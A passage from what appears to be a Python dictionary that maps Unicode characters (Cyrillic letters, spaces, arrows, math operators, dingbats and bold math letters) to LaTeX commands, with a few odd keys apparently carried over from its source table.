u"\u04D8":"\\cyrchar\\CYRSCHWA",
u"\u04D9":"\\cyrchar\\cyrschwa",
u"\u04E0":"\\cyrchar\\CYRABHDZE",
u"\u04E1":"\\cyrchar\\cyrabhdze",
u"\u04E8":"\\cyrchar\\CYROTLD",
u"\u04E9":"\\cyrchar\\cyrotld",
u"\u2002":"\\hspace{0.6em}",
u"\u2003":"\\hspace{1em}",
u"\u2004":"\\hspace{0.33em}",
u"\u2005":"\\hspace{0.25em}",
u"\u2006":"\\hspace{0.166em}",
u"\u2007":"\\hphantom{0}",
u"\u2008":"\\hphantom{,}",
u"\u2009":"\\hspace{0.167em}",
u"\u2009-0200A-0200A":"\\;",
u"\u200A":"\\mkern1mu",
u"\u2013":"\\textendash",
u"\u2014":"\\textemdash",
u"\u2015":"\\rule{1em}{1pt}",
u"\u2016":"\\Vert",
u"\u201B":"\\Elzreapos",
u"\u201C":"\\textquotedblleft",
u"\u201D":"\\textquotedblright",
u"\u201E":",,",
u"\u2020":"\\textdagger",
u"\u2021":"\\textdaggerdbl",
u"\u2022":"\\textbullet",
u"\u2025":"..",
u"\u2026":"\\ldots",
u"\u2030":"\\textperthousand",
u"\u2031":"\\textpertenthousand",
u"\u2032":"{\\'}",
u"\u2033":"{\\'\\'}",
u"\u2034":"{\\'\\'\\'}",
u"\u2035":"\\backprime",
u"\u2039":"\\guilsinglleft",
u"\u203A":"\\guilsinglright",
u"\u2057":"\\'\\'\\'\\'",
u"\u205F":"\\mkern4mu",
u"\u2060":"\\nolinebreak",
u"\u20A7":"\\ensuremath{\\Elzpes}",
u"\u20AC":"\\mbox{\\texteuro}",
u"\u20DB":"\\dddot",
u"\u20DC":"\\ddddot",
u"\u2102":"\\mathbb{C}",
u"\u210A":"\\mathscr{g}",
u"\u210B":"\\mathscr{H}",
u"\u210C":"\\mathfrak{H}",
u"\u210D":"\\mathbb{H}",
u"\u210F":"\\hslash",
u"\u2110":"\\mathscr{I}",
u"\u2111":"\\mathfrak{I}",
u"\u2112":"\\mathscr{L}",
u"\u2113":"\\mathscr{l}",
u"\u2115":"\\mathbb{N}",
u"\u2116":"\\cyrchar\\textnumero",
u"\u2118":"\\wp",
u"\u2119":"\\mathbb{P}",
u"\u211A":"\\mathbb{Q}",
u"\u211B":"\\mathscr{R}",
u"\u211C":"\\mathfrak{R}",
u"\u211D":"\\mathbb{R}",
u"\u211E":"\\Elzxrat",
u"\u2122":"\\texttrademark",
u"\u2124":"\\mathbb{Z}",
u"\u2126":"\\Omega",
u"\u2127":"\\mho",
u"\u2128":"\\mathfrak{Z}",
u"\u2129":"\\ElsevierGlyph{2129}",
u"\u212B":"\\AA",
u"\u212C":"\\mathscr{B}",
u"\u212D":"\\mathfrak{C}",
u"\u212F":"\\mathscr{e}",
u"\u2130":"\\mathscr{E}",
u"\u2131":"\\mathscr{F}",
u"\u2133":"\\mathscr{M}",
u"\u2134":"\\mathscr{o}",
u"\u2135":"\\aleph",
u"\u2136":"\\beth",
u"\u2137":"\\gimel",
u"\u2138":"\\daleth",
u"\u2153":"\\textfrac{1}{3}",
u"\u2154":"\\textfrac{2}{3}",
u"\u2155":"\\textfrac{1}{5}",
u"\u2156":"\\textfrac{2}{5}",
u"\u2157":"\\textfrac{3}{5}",
u"\u2158":"\\textfrac{4}{5}",
u"\u2159":"\\textfrac{1}{6}",
u"\u215A":"\\textfrac{5}{6}",
u"\u215B":"\\textfrac{1}{8}",
u"\u215C":"\\textfrac{3}{8}",
u"\u215D":"\\textfrac{5}{8}",
u"\u215E":"\\textfrac{7}{8}",
u"\u2190":"\\leftarrow",
u"\u2191":"\\uparrow",
u"\u2192":"\\rightarrow",
u"\u2193":"\\downarrow",
u"\u2194":"\\leftrightarrow",
u"\u2195":"\\updownarrow",
u"\u2196":"\\nwarrow",
u"\u2197":"\\nearrow",
u"\u2198":"\\searrow",
u"\u2199":"\\swarrow",
u"\u219A":"\\nleftarrow",
u"\u219B":"\\nrightarrow",
u"\u219C":"\\arrowwaveright",
u"\u219D":"\\arrowwaveright",
u"\u219E":"\\twoheadleftarrow",
u"\u21A0":"\\twoheadrightarrow",
u"\u21A2":"\\leftarrowtail",
u"\u21A3":"\\rightarrowtail",
u"\u21A6":"\\mapsto",
u"\u21A9":"\\hookleftarrow",
u"\u21AA":"\\hookrightarrow",
u"\u21AB":"\\looparrowleft",
u"\u21AC":"\\looparrowright",
u"\u21AD":"\\leftrightsquigarrow",
u"\u21AE":"\\nleftrightarrow",
u"\u21B0":"\\Lsh",
u"\u21B1":"\\Rsh",
u"\u21B3":"\\ElsevierGlyph{21B3}",
u"\u21B6":"\\curvearrowleft",
u"\u21B7":"\\curvearrowright",
u"\u21BA":"\\circlearrowleft",
u"\u21BB":"\\circlearrowright",
u"\u21BC":"\\leftharpoonup",
u"\u21BD":"\\leftharpoondown",
u"\u21BE":"\\upharpoonright",
u"\u21BF":"\\upharpoonleft",
u"\u21C0":"\\rightharpoonup",
u"\u21C1":"\\rightharpoondown",
u"\u21C2":"\\downharpoonright",
u"\u21C3":"\\downharpoonleft",
u"\u21C4":"\\rightleftarrows",
u"\u21C5":"\\dblarrowupdown",
u"\u21C6":"\\leftrightarrows",
u"\u21C7":"\\leftleftarrows",
u"\u21C8":"\\upuparrows",
u"\u21C9":"\\rightrightarrows",
u"\u21CA":"\\downdownarrows",
u"\u21CB":"\\leftrightharpoons",
u"\u21CC":"\\rightleftharpoons",
u"\u21CD":"\\nLeftarrow",
u"\u21CE":"\\nLeftrightarrow",
u"\u21CF":"\\nRightarrow",
u"\u21D0":"\\Leftarrow",
u"\u21D1":"\\Uparrow",
u"\u21D2":"\\Rightarrow",
u"\u21D3":"\\Downarrow",
u"\u21D4":"\\Leftrightarrow",
u"\u21D5":"\\Updownarrow",
u"\u21DA":"\\Lleftarrow",
u"\u21DB":"\\Rrightarrow",
u"\u21DD":"\\rightsquigarrow",
u"\u21F5":"\\DownArrowUpArrow",
u"\u2200":"\\forall",
u"\u2201":"\\complement",
u"\u2202":"\\partial",
u"\u2203":"\\exists",
u"\u2204":"\\nexists",
u"\u2205":"\\varnothing",
u"\u2207":"\\nabla",
u"\u2208":"\\in",
u"\u2209":"\\not\\in",
u"\u220B":"\\ni",
u"\u220C":"\\not\\ni",
u"\u220F":"\\prod",
u"\u2210":"\\coprod",
u"\u2211":"\\sum",
u"\u2213":"\\mp",
u"\u2214":"\\dotplus",
u"\u2216":"\\setminus",
u"\u2217":"{_\\ast}",
u"\u2218":"\\circ",
u"\u2219":"\\bullet",
u"\u221A":"\\surd",
u"\u221D":"\\propto",
u"\u221E":"\\infty",
u"\u221F":"\\rightangle",
u"\u2220":"\\angle",
u"\u2221":"\\measuredangle",
u"\u2222":"\\sphericalangle",
u"\u2223":"\\mid",
u"\u2224":"\\nmid",
u"\u2225":"\\parallel",
u"\u2226":"\\nparallel",
u"\u2227":"\\wedge",
u"\u2228":"\\vee",
u"\u2229":"\\cap",
u"\u222A":"\\cup",
u"\u222B":"\\int",
u"\u222C":"\\int\\!\\int",
u"\u222D":"\\int\\!\\int\\!\\int",
u"\u222E":"\\oint",
u"\u222F":"\\surfintegral",
u"\u2230":"\\volintegral",
u"\u2231":"\\clwintegral",
u"\u2232":"\\ElsevierGlyph{2232}",
u"\u2233":"\\ElsevierGlyph{2233}",
u"\u2234":"\\therefore",
u"\u2235":"\\because",
u"\u2237":"\\Colon",
u"\u2238":"\\ElsevierGlyph{2238}",
u"\u223A":"\\mathbin{{:}\\!\\!{-}\\!\\!{:}}",
u"\u223B":"\\homothetic",
u"\u223C":"\\sim",
u"\u223D":"\\backsim",
u"\u223E":"\\lazysinv",
u"\u2240":"\\wr",
u"\u2241":"\\not\\sim",
u"\u2242":"\\ElsevierGlyph{2242}",
u"\u2242-00338":"\\NotEqualTilde",
u"\u2243":"\\simeq",
u"\u2244":"\\not\\simeq",
u"\u2245":"\\cong",
u"\u2246":"\\approxnotequal",
u"\u2247":"\\not\\cong",
u"\u2248":"\\approx",
u"\u2249":"\\not\\approx",
u"\u224A":"\\approxeq",
u"\u224B":"\\tildetrpl",
u"\u224B-00338":"\\not\\apid",
u"\u224C":"\\allequal",
u"\u224D":"\\asymp",
u"\u224E":"\\Bumpeq",
u"\u224E-00338":"\\NotHumpDownHump",
u"\u224F":"\\bumpeq",
u"\u224F-00338":"\\NotHumpEqual",
u"\u2250":"\\doteq",
u"\u2250-00338":"\\not\\doteq",
u"\u2251":"\\doteqdot",
u"\u2252":"\\fallingdotseq",
u"\u2253":"\\risingdotseq",
u"\u2254":":=",
u"\u2255":"=:",
u"\u2256":"\\eqcirc",
u"\u2257":"\\circeq",
u"\u2259":"\\estimates",
u"\u225A":"\\ElsevierGlyph{225A}",
u"\u225B":"\\starequal",
u"\u225C":"\\triangleq",
u"\u225F":"\\ElsevierGlyph{225F}",
u"\u2260":"\\not =",
u"\u2261":"\\equiv",
u"\u2262":"\\not\\equiv",
u"\u2264":"\\leq",
u"\u2265":"\\geq",
u"\u2266":"\\leqq",
u"\u2267":"\\geqq",
u"\u2268":"\\lneqq",
u"\u2268-0FE00":"\\lvertneqq",
u"\u2269":"\\gneqq",
u"\u2269-0FE00":"\\gvertneqq",
u"\u226A":"\\ll",
u"\u226A-00338":"\\NotLessLess",
u"\u226B":"\\gg",
u"\u226B-00338":"\\NotGreaterGreater",
u"\u226C":"\\between",
u"\u226D":"\\not\\kern-0.3em\\times",
u"\u226E":"\\not<",
u"\u226F":"\\not>",
u"\u2270":"\\not\\leq",
u"\u2271":"\\not\\geq",
u"\u2272":"\\lessequivlnt",
u"\u2273":"\\greaterequivlnt",
u"\u2274":"\\ElsevierGlyph{2274}",
u"\u2275":"\\ElsevierGlyph{2275}",
u"\u2276":"\\lessgtr",
u"\u2277":"\\gtrless",
u"\u2278":"\\notlessgreater",
u"\u2279":"\\notgreaterless",
u"\u227A":"\\prec",
u"\u227B":"\\succ",
u"\u227C":"\\preccurlyeq",
u"\u227D":"\\succcurlyeq",
u"\u227E":"\\precapprox",
u"\u227E-00338":"\\NotPrecedesTilde",
u"\u227F":"\\succapprox",
u"\u227F-00338":"\\NotSucceedsTilde",
u"\u2280":"\\not\\prec",
u"\u2281":"\\not\\succ",
u"\u2282":"\\subset",
u"\u2283":"\\supset",
u"\u2284":"\\not\\subset",
u"\u2285":"\\not\\supset",
u"\u2286":"\\subseteq",
u"\u2287":"\\supseteq",
u"\u2288":"\\not\\subseteq",
u"\u2289":"\\not\\supseteq",
u"\u228A":"\\subsetneq",
u"\u228A-0FE00":"\\varsubsetneqq",
u"\u228B":"\\supsetneq",
u"\u228B-0FE00":"\\varsupsetneq",
u"\u228E":"\\uplus",
u"\u228F":"\\sqsubset",
u"\u228F-00338":"\\NotSquareSubset",
u"\u2290":"\\sqsupset",
u"\u2290-00338":"\\NotSquareSuperset",
u"\u2291":"\\sqsubseteq",
u"\u2292":"\\sqsupseteq",
u"\u2293":"\\sqcap",
u"\u2294":"\\sqcup",
u"\u2295":"\\oplus",
u"\u2296":"\\ominus",
u"\u2297":"\\otimes",
u"\u2298":"\\oslash",
u"\u2299":"\\odot",
u"\u229A":"\\circledcirc",
u"\u229B":"\\circledast",
u"\u229D":"\\circleddash",
u"\u229E":"\\boxplus",
u"\u229F":"\\boxminus",
u"\u22A0":"\\boxtimes",
u"\u22A1":"\\boxdot",
u"\u22A2":"\\vdash",
u"\u22A3":"\\dashv",
u"\u22A4":"\\top",
u"\u22A5":"\\perp",
u"\u22A7":"\\truestate",
u"\u22A8":"\\forcesextra",
u"\u22A9":"\\Vdash",
u"\u22AA":"\\Vvdash",
u"\u22AB":"\\VDash",
u"\u22AC":"\\nvdash",
u"\u22AD":"\\nvDash",
u"\u22AE":"\\nVdash",
u"\u22AF":"\\nVDash",
u"\u22B2":"\\vartriangleleft",
u"\u22B3":"\\vartriangleright",
u"\u22B4":"\\trianglelefteq",
u"\u22B5":"\\trianglerighteq",
u"\u22B6":"\\original",
u"\u22B7":"\\image",
u"\u22B8":"\\multimap",
u"\u22B9":"\\hermitconjmatrix",
u"\u22BA":"\\intercal",
u"\u22BB":"\\veebar",
u"\u22BE":"\\rightanglearc",
u"\u22C0":"\\ElsevierGlyph{22C0}",
u"\u22C1":"\\ElsevierGlyph{22C1}",
u"\u22C2":"\\bigcap",
u"\u22C3":"\\bigcup",
u"\u22C4":"\\diamond",
u"\u22C5":"\\cdot",
u"\u22C6":"\\star",
u"\u22C7":"\\divideontimes",
u"\u22C8":"\\bowtie",
u"\u22C9":"\\ltimes",
u"\u22CA":"\\rtimes",
u"\u22CB":"\\leftthreetimes",
u"\u22CC":"\\rightthreetimes",
u"\u22CD":"\\backsimeq",
u"\u22CE":"\\curlyvee",
u"\u22CF":"\\curlywedge",
u"\u22D0":"\\Subset",
u"\u22D1":"\\Supset",
u"\u22D2":"\\Cap",
u"\u22D3":"\\Cup",
u"\u22D4":"\\pitchfork",
u"\u22D6":"\\lessdot",
u"\u22D7":"\\gtrdot",
u"\u22D8":"\\verymuchless",
u"\u22D9":"\\verymuchgreater",
u"\u22DA":"\\lesseqgtr",
u"\u22DB":"\\gtreqless",
u"\u22DE":"\\curlyeqprec",
u"\u22DF":"\\curlyeqsucc",
u"\u22E2":"\\not\\sqsubseteq",
u"\u22E3":"\\not\\sqsupseteq",
u"\u22E5":"\\Elzsqspne",
u"\u22E6":"\\lnsim",
u"\u22E7":"\\gnsim",
u"\u22E8":"\\precedesnotsimilar",
u"\u22E9":"\\succnsim",
u"\u22EA":"\\ntriangleleft",
u"\u22EB":"\\ntriangleright",
u"\u22EC":"\\ntrianglelefteq",
u"\u22ED":"\\ntrianglerighteq",
u"\u22EE":"\\vdots",
u"\u22EF":"\\cdots",
u"\u22F0":"\\upslopeellipsis",
u"\u22F1":"\\downslopeellipsis",
u"\u2305":"\\barwedge",
u"\u2306":"\\perspcorrespond",
u"\u2308":"\\lceil",
u"\u2309":"\\rceil",
u"\u230A":"\\lfloor",
u"\u230B":"\\rfloor",
u"\u2315":"\\recorder",
u"\u231C":"\\ulcorner",
u"\u231D":"\\urcorner",
u"\u231E":"\\llcorner",
u"\u231F":"\\lrcorner",
u"\u2322":"\\frown",
u"\u2323":"\\smile",
u"\u2329":"\\langle",
u"\u232A":"\\rangle",
u"\u233D":"\\ElsevierGlyph{E838}",
u"\u23A3":"\\Elzdlcorn",
u"\u23B0":"\\lmoustache",
u"\u23B1":"\\rmoustache",
u"\u2423":"\\textvisiblespace",
u"\u2460":"\\ding{172}",
u"\u2461":"\\ding{173}",
u"\u2462":"\\ding{174}",
u"\u2463":"\\ding{175}",
u"\u2464":"\\ding{176}",
u"\u2465":"\\ding{177}",
u"\u2466":"\\ding{178}",
u"\u2467":"\\ding{179}",
u"\u2468":"\\ding{180}",
u"\u2469":"\\ding{181}",
u"\u24C8":"\\circledS",
u"\u2506":"\\Elzdshfnc",
u"\u2519":"\\Elzsqfnw",
u"\u2571":"\\diagup",
u"\u25A0":"\\ding{110}",
u"\u25A1":"\\square",
u"\u25AA":"\\blacksquare",
u"\u25AD":"\\fbox{~~}",
u"\u25AF":"\\Elzvrecto",
u"\u25B1":"\\ElsevierGlyph{E381}",
u"\u25B2":"\\ding{115}",
u"\u25B3":"\\bigtriangleup",
u"\u25B4":"\\blacktriangle",
u"\u25B5":"\\vartriangle",
u"\u25B8":"\\blacktriangleright",
u"\u25B9":"\\triangleright",
u"\u25BC":"\\ding{116}",
u"\u25BD":"\\bigtriangledown",
u"\u25BE":"\\blacktriangledown",
u"\u25BF":"\\triangledown",
u"\u25C2":"\\blacktriangleleft",
u"\u25C3":"\\triangleleft",
u"\u25C6":"\\ding{117}",
u"\u25CA":"\\lozenge",
u"\u25CB":"\\bigcirc",
u"\u25CF":"\\ding{108}",
u"\u25D0":"\\Elzcirfl",
u"\u25D1":"\\Elzcirfr",
u"\u25D2":"\\Elzcirfb",
u"\u25D7":"\\ding{119}",
u"\u25D8":"\\Elzrvbull",
u"\u25E7":"\\Elzsqfl",
u"\u25E8":"\\Elzsqfr",
u"\u25EA":"\\Elzsqfse",
u"\u25EF":"\\bigcirc",
u"\u2605":"\\ding{72}",
u"\u2606":"\\ding{73}",
u"\u260E":"\\ding{37}",
u"\u261B":"\\ding{42}",
u"\u261E":"\\ding{43}",
u"\u263E":"\\rightmoon",
u"\u263F":"\\mercury",
u"\u2640":"\\venus",
u"\u2642":"\\male",
u"\u2643":"\\jupiter",
u"\u2644":"\\saturn",
u"\u2645":"\\uranus",
u"\u2646":"\\neptune",
u"\u2647":"\\pluto",
u"\u2648":"\\aries",
u"\u2649":"\\taurus",
u"\u264A":"\\gemini",
u"\u264B":"\\cancer",
u"\u264C":"\\leo",
u"\u264D":"\\virgo",
u"\u264E":"\\libra",
u"\u264F":"\\scorpio",
u"\u2650":"\\sagittarius",
u"\u2651":"\\capricornus",
u"\u2652":"\\aquarius",
u"\u2653":"\\pisces",
u"\u2660":"\\ding{171}",
u"\u2662":"\\diamond",
u"\u2663":"\\ding{168}",
u"\u2665":"\\ding{170}",
u"\u2666":"\\ding{169}",
u"\u2669":"\\quarternote",
u"\u266A":"\\eighthnote",
u"\u266D":"\\flat",
u"\u266E":"\\natural",
u"\u266F":"\\sharp",
u"\u2701":"\\ding{33}",
u"\u2702":"\\ding{34}",
u"\u2703":"\\ding{35}",
u"\u2704":"\\ding{36}",
u"\u2706":"\\ding{38}",
u"\u2707":"\\ding{39}",
u"\u2708":"\\ding{40}",
u"\u2709":"\\ding{41}",
u"\u270C":"\\ding{44}",
u"\u270D":"\\ding{45}",
u"\u270E":"\\ding{46}",
u"\u270F":"\\ding{47}",
u"\u2710":"\\ding{48}",
u"\u2711":"\\ding{49}",
u"\u2712":"\\ding{50}",
u"\u2713":"\\ding{51}",
u"\u2714":"\\ding{52}",
u"\u2715":"\\ding{53}",
u"\u2716":"\\ding{54}",
u"\u2717":"\\ding{55}",
u"\u2718":"\\ding{56}",
u"\u2719":"\\ding{57}",
u"\u271A":"\\ding{58}",
u"\u271B":"\\ding{59}",
u"\u271C":"\\ding{60}",
u"\u271D":"\\ding{61}",
u"\u271E":"\\ding{62}",
u"\u271F":"\\ding{63}",
u"\u2720":"\\ding{64}",
u"\u2721":"\\ding{65}",
u"\u2722":"\\ding{66}",
u"\u2723":"\\ding{67}",
u"\u2724":"\\ding{68}",
u"\u2725":"\\ding{69}",
u"\u2726":"\\ding{70}",
u"\u2727":"\\ding{71}",
u"\u2729":"\\ding{73}",
u"\u272A":"\\ding{74}",
u"\u272B":"\\ding{75}",
u"\u272C":"\\ding{76}",
u"\u272D":"\\ding{77}",
u"\u272E":"\\ding{78}",
u"\u272F":"\\ding{79}",
u"\u2730":"\\ding{80}",
u"\u2731":"\\ding{81}",
u"\u2732":"\\ding{82}",
u"\u2733":"\\ding{83}",
u"\u2734":"\\ding{84}",
u"\u2735":"\\ding{85}",
u"\u2736":"\\ding{86}",
u"\u2737":"\\ding{87}",
u"\u2738":"\\ding{88}",
u"\u2739":"\\ding{89}",
u"\u273A":"\\ding{90}",
u"\u273B":"\\ding{91}",
u"\u273C":"\\ding{92}",
u"\u273D":"\\ding{93}",
u"\u273E":"\\ding{94}",
u"\u273F":"\\ding{95}",
u"\u2740":"\\ding{96}",
u"\u2741":"\\ding{97}",
u"\u2742":"\\ding{98}",
u"\u2743":"\\ding{99}",
u"\u2744":"\\ding{100}",
u"\u2745":"\\ding{101}",
u"\u2746":"\\ding{102}",
u"\u2747":"\\ding{103}",
u"\u2748":"\\ding{104}",
u"\u2749":"\\ding{105}",
u"\u274A":"\\ding{106}",
u"\u274B":"\\ding{107}",
u"\u274D":"\\ding{109}",
u"\u274F":"\\ding{111}",
u"\u2750":"\\ding{112}",
u"\u2751":"\\ding{113}",
u"\u2752":"\\ding{114}",
u"\u2756":"\\ding{118}",
u"\u2758":"\\ding{120}",
u"\u2759":"\\ding{121}",
u"\u275A":"\\ding{122}",
u"\u275B":"\\ding{123}",
u"\u275C":"\\ding{124}",
u"\u275D":"\\ding{125}",
u"\u275E":"\\ding{126}",
u"\u2761":"\\ding{161}",
u"\u2762":"\\ding{162}",
u"\u2763":"\\ding{163}",
u"\u2764":"\\ding{164}",
u"\u2765":"\\ding{165}",
u"\u2766":"\\ding{166}",
u"\u2767":"\\ding{167}",
u"\u2776":"\\ding{182}",
u"\u2777":"\\ding{183}",
u"\u2778":"\\ding{184}",
u"\u2779":"\\ding{185}",
u"\u277A":"\\ding{186}",
u"\u277B":"\\ding{187}",
u"\u277C":"\\ding{188}",
u"\u277D":"\\ding{189}",
u"\u277E":"\\ding{190}",
u"\u277F":"\\ding{191}",
u"\u2780":"\\ding{192}",
u"\u2781":"\\ding{193}",
u"\u2782":"\\ding{194}",
u"\u2783":"\\ding{195}",
u"\u2784":"\\ding{196}",
u"\u2785":"\\ding{197}",
u"\u2786":"\\ding{198}",
u"\u2787":"\\ding{199}",
u"\u2788":"\\ding{200}",
u"\u2789":"\\ding{201}",
u"\u278A":"\\ding{202}",
u"\u278B":"\\ding{203}",
u"\u278C":"\\ding{204}",
u"\u278D":"\\ding{205}",
u"\u278E":"\\ding{206}",
u"\u278F":"\\ding{207}",
u"\u2790":"\\ding{208}",
u"\u2791":"\\ding{209}",
u"\u2792":"\\ding{210}",
u"\u2793":"\\ding{211}",
u"\u2794":"\\ding{212}",
u"\u2798":"\\ding{216}",
u"\u2799":"\\ding{217}",
u"\u279A":"\\ding{218}",
u"\u279B":"\\ding{219}",
u"\u279C":"\\ding{220}",
u"\u279D":"\\ding{221}",
u"\u279E":"\\ding{222}",
u"\u279F":"\\ding{223}",
u"\u27A0":"\\ding{224}",
u"\u27A1":"\\ding{225}",
u"\u27A2":"\\ding{226}",
u"\u27A3":"\\ding{227}",
u"\u27A4":"\\ding{228}",
u"\u27A5":"\\ding{229}",
u"\u27A6":"\\ding{230}",
u"\u27A7":"\\ding{231}",
u"\u27A8":"\\ding{232}",
u"\u27A9":"\\ding{233}",
u"\u27AA":"\\ding{234}",
u"\u27AB":"\\ding{235}",
u"\u27AC":"\\ding{236}",
u"\u27AD":"\\ding{237}",
u"\u27AE":"\\ding{238}",
u"\u27AF":"\\ding{239}",
u"\u27B1":"\\ding{241}",
u"\u27B2":"\\ding{242}",
u"\u27B3":"\\ding{243}",
u"\u27B4":"\\ding{244}",
u"\u27B5":"\\ding{245}",
u"\u27B6":"\\ding{246}",
u"\u27B7":"\\ding{247}",
u"\u27B8":"\\ding{248}",
u"\u27B9":"\\ding{249}",
u"\u27BA":"\\ding{250}",
u"\u27BB":"\\ding{251}",
u"\u27BC":"\\ding{252}",
u"\u27BD":"\\ding{253}",
u"\u27BE":"\\ding{254}",
u"\u27F5":"\\longleftarrow",
u"\u27F6":"\\longrightarrow",
u"\u27F7":"\\longleftrightarrow",
u"\u27F8":"\\Longleftarrow",
u"\u27F9":"\\Longrightarrow",
u"\u27FA":"\\Longleftrightarrow",
u"\u27FC":"\\longmapsto",
u"\u27FF":"\\sim\\joinrel\\leadsto",
u"\u2905":"\\ElsevierGlyph{E212}",
u"\u2912":"\\UpArrowBar",
u"\u2913":"\\DownArrowBar",
u"\u2923":"\\ElsevierGlyph{E20C}",
u"\u2924":"\\ElsevierGlyph{E20D}",
u"\u2925":"\\ElsevierGlyph{E20B}",
u"\u2926":"\\ElsevierGlyph{E20A}",
u"\u2927":"\\ElsevierGlyph{E211}",
u"\u2928":"\\ElsevierGlyph{E20E}",
u"\u2929":"\\ElsevierGlyph{E20F}",
u"\u292A":"\\ElsevierGlyph{E210}",
u"\u2933":"\\ElsevierGlyph{E21C}",
u"\u2933-00338":"\\ElsevierGlyph{E21D}",
u"\u2936":"\\ElsevierGlyph{E21A}",
u"\u2937":"\\ElsevierGlyph{E219}",
u"\u2940":"\\Elolarr",
u"\u2941":"\\Elorarr",
u"\u2942":"\\ElzRlarr",
u"\u2944":"\\ElzrLarr",
u"\u2947":"\\Elzrarrx",
u"\u294E":"\\LeftRightVector",
u"\u294F":"\\RightUpDownVector",
u"\u2950":"\\DownLeftRightVector",
u"\u2951":"\\LeftUpDownVector",
u"\u2952":"\\LeftVectorBar",
u"\u2953":"\\RightVectorBar",
u"\u2954":"\\RightUpVectorBar",
u"\u2955":"\\RightDownVectorBar",
u"\u2956":"\\DownLeftVectorBar",
u"\u2957":"\\DownRightVectorBar",
u"\u2958":"\\LeftUpVectorBar",
u"\u2959":"\\LeftDownVectorBar",
u"\u295A":"\\LeftTeeVector",
u"\u295B":"\\RightTeeVector",
u"\u295C":"\\RightUpTeeVector",
u"\u295D":"\\RightDownTeeVector",
u"\u295E":"\\DownLeftTeeVector",
u"\u295F":"\\DownRightTeeVector",
u"\u2960":"\\LeftUpTeeVector",
u"\u2961":"\\LeftDownTeeVector",
u"\u296E":"\\UpEquilibrium",
u"\u296F":"\\ReverseUpEquilibrium",
u"\u2970":"\\RoundImplies",
u"\u297C":"\\ElsevierGlyph{E214}",
u"\u297D":"\\ElsevierGlyph{E215}",
u"\u2980":"\\Elztfnc",
u"\u2985":"\\ElsevierGlyph{3018}",
u"\u2986":"\\Elroang",
u"\u2993":"<\\kern-0.58em(",
u"\u2994":"\\ElsevierGlyph{E291}",
u"\u2999":"\\Elzddfnc",
u"\u299C":"\\Angle",
u"\u29A0":"\\Elzlpargt",
u"\u29B5":"\\ElsevierGlyph{E260}",
u"\u29B6":"\\ElsevierGlyph{E61B}",
u"\u29CA":"\\ElzLap",
u"\u29CB":"\\Elzdefas",
u"\u29CF":"\\LeftTriangleBar",
u"\u29CF-00338":"\\NotLeftTriangleBar",
u"\u29D0":"\\RightTriangleBar",
u"\u29D0-00338":"\\NotRightTriangleBar",
u"\u29DC":"\\ElsevierGlyph{E372}",
u"\u29EB":"\\blacklozenge",
u"\u29F4":"\\RuleDelayed",
u"\u2A04":"\\Elxuplus",
u"\u2A05":"\\ElzThr",
u"\u2A06":"\\Elxsqcup",
u"\u2A07":"\\ElzInf",
u"\u2A08":"\\ElzSup",
u"\u2A0D":"\\ElzCint",
u"\u2A0F":"\\clockoint",
u"\u2A10":"\\ElsevierGlyph{E395}",
u"\u2A16":"\\sqrint",
u"\u2A25":"\\ElsevierGlyph{E25A}",
u"\u2A2A":"\\ElsevierGlyph{E25B}",
u"\u2A2D":"\\ElsevierGlyph{E25C}",
u"\u2A2E":"\\ElsevierGlyph{E25D}",
u"\u2A2F":"\\ElzTimes",
u"\u2A34":"\\ElsevierGlyph{E25E}",
u"\u2A35":"\\ElsevierGlyph{E25E}",
u"\u2A3C":"\\ElsevierGlyph{E259}",
u"\u2A3F":"\\amalg",
u"\u2A53":"\\ElzAnd",
u"\u2A54":"\\ElzOr",
u"\u2A55":"\\ElsevierGlyph{E36E}",
u"\u2A56":"\\ElOr",
u"\u2A5E":"\\perspcorrespond",
u"\u2A5F":"\\Elzminhat",
u"\u2A63":"\\ElsevierGlyph{225A}",
u"\u2A6E":"\\stackrel{*}{=}",
u"\u2A75":"\\Equal",
u"\u2A7D":"\\leqslant",
u"\u2A7D-00338":"\\nleqslant",
u"\u2A7E":"\\geqslant",
u"\u2A7E-00338":"\\ngeqslant",
u"\u2A85":"\\lessapprox",
u"\u2A86":"\\gtrapprox",
u"\u2A87":"\\lneq",
u"\u2A88":"\\gneq",
u"\u2A89":"\\lnapprox",
u"\u2A8A":"\\gnapprox",
u"\u2A8B":"\\lesseqqgtr",
u"\u2A8C":"\\gtreqqless",
u"\u2A95":"\\eqslantless",
u"\u2A96":"\\eqslantgtr",
u"\u2A9D":"\\Pisymbol{ppi020}{117}",
u"\u2A9E":"\\Pisymbol{ppi020}{105}",
u"\u2AA1":"\\NestedLessLess",
u"\u2AA1-00338":"\\NotNestedLessLess",
u"\u2AA2":"\\NestedGreaterGreater",
u"\u2AA2-00338":"\\NotNestedGreaterGreater",
u"\u2AAF":"\\preceq",
u"\u2AAF-00338":"\\not\\preceq",
u"\u2AB0":"\\succeq",
u"\u2AB0-00338":"\\not\\succeq",
u"\u2AB5":"\\precneqq",
u"\u2AB6":"\\succneqq",
u"\u2AB7":"\\precapprox",
u"\u2AB8":"\\succapprox",
u"\u2AB9":"\\precnapprox",
u"\u2ABA":"\\succnapprox",
u"\u2AC5":"\\subseteqq",
u"\u2AC5-00338":"\\nsubseteqq",
u"\u2AC6":"\\supseteqq",
u"\u2AC6-00338":"\\nsupseteqq",
u"\u2ACB":"\\subsetneqq",
u"\u2ACC":"\\supsetneqq",
u"\u2AEB":"\\ElsevierGlyph{E30D}",
u"\u2AF6":"\\Elztdcol",
u"\u2AFD":"{{/}\\!\\!{/}}",
u"\u2AFD-020E5":"{\\rlap{\\textbackslash}{{/}\\!\\!{/}}}",
u"\u300A":"\\ElsevierGlyph{300A}",
u"\u300B":"\\ElsevierGlyph{300B}",
u"\u3018":"\\ElsevierGlyph{3018}",
u"\u3019":"\\ElsevierGlyph{3019}",
u"\u301A":"\\openbracketleft",
u"\u301B":"\\openbracketright",
u"\uD400":"\\mathbf{A}",
u"\uD401":"\\mathbf{B}",
u"\uD402":"\\mathbf{C}",
u"\uD403":"\\mathbf{D}",
u"\uD404":"\\mathbf{E}",
u"\uD405":"\\mathbf{F}",
u"\uD406":"\\mathbf{G}",
u"\uD407":"\\mathbf{H}",
u"\uD408":"\\mathbf{I}",
u"\uD409":"\\mathbf{J}",
u"\uD40A":"\\mathbf{K}",
u"\uD40B":"\\mathbf{L}",
u"\uD40C":"\\mathbf{M}",
u"\uD40D":"\\mathbf{N}",
u"\uD40E":"\\mathbf{O}",
u"\uD40F":"\\mathbf{P}",
u"\uD410":"\\mathbf{Q}",
u"\uD411":"\\mathbf{R}",
u"\uD412":"\\mathbf{S}",
u"\uD413":"\\mathbf{T}",
u"\uD414":"\\mathbf{U}",
